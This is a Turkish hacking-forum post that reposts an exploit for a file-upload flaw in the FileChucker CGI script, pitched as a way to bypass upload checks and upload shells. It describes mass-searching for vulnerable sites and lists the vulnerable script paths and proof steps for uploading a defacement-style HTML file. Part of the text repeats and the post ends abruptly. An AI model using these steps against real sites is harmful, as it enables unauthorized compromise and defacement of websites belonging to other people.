-
S3CH4TZ
S4
Belki çoğumuz bu upload açığını biliyoruz .. Ancak Shell upload etmeyi bilenler kadar bilmeyenlerde mevcut... Bu exploitte hem by pass hemde shell upload edebileceğimiz bir konuyu derledim..
Not:Alıntıdır..(Dediğim gibi derleme)
Yukarıdaki gibi arattığımızda karşımıza bir çok site çıkacaktır... 166,000 kadar fakat bunların bir çoğu sahte (fake-malware) sitelerdir...
Baktık buraya kadar herşey tamam...
Not:Alıntıdır..(Dediğim gibi derleme)
Kod:
# [+] Exploit:
#
# [+] http://localhost/[path]/cgi-bin/filechucker.cgi
# [+] http://localhost/[path]/cgi-bin/filechucker.pl
#
#
#######################################################
#
# [+] Proof:
#
# [+] http://localhost/[path]/cgi-bin/filechucker.cgi
# [1] You must enter the requested information first.
# [2] Please Click on the Browse and Select a file ( .htm , .html , .gif , .jpg , .png , .txt )
# [3] http://localhost/[path]/upload/files/KRaLBaY.htm OR Siyah-h.html
#Yukarıdaki gibi arattığımızda karşımıza bir çok site çıkacaktır... 166,000 kadar fakat bunların bir çoğu sahte (fake-malware) sitelerdir...
Baktık buraya kadar herşey tamam...
Moderatörün son düzenlenenleri:
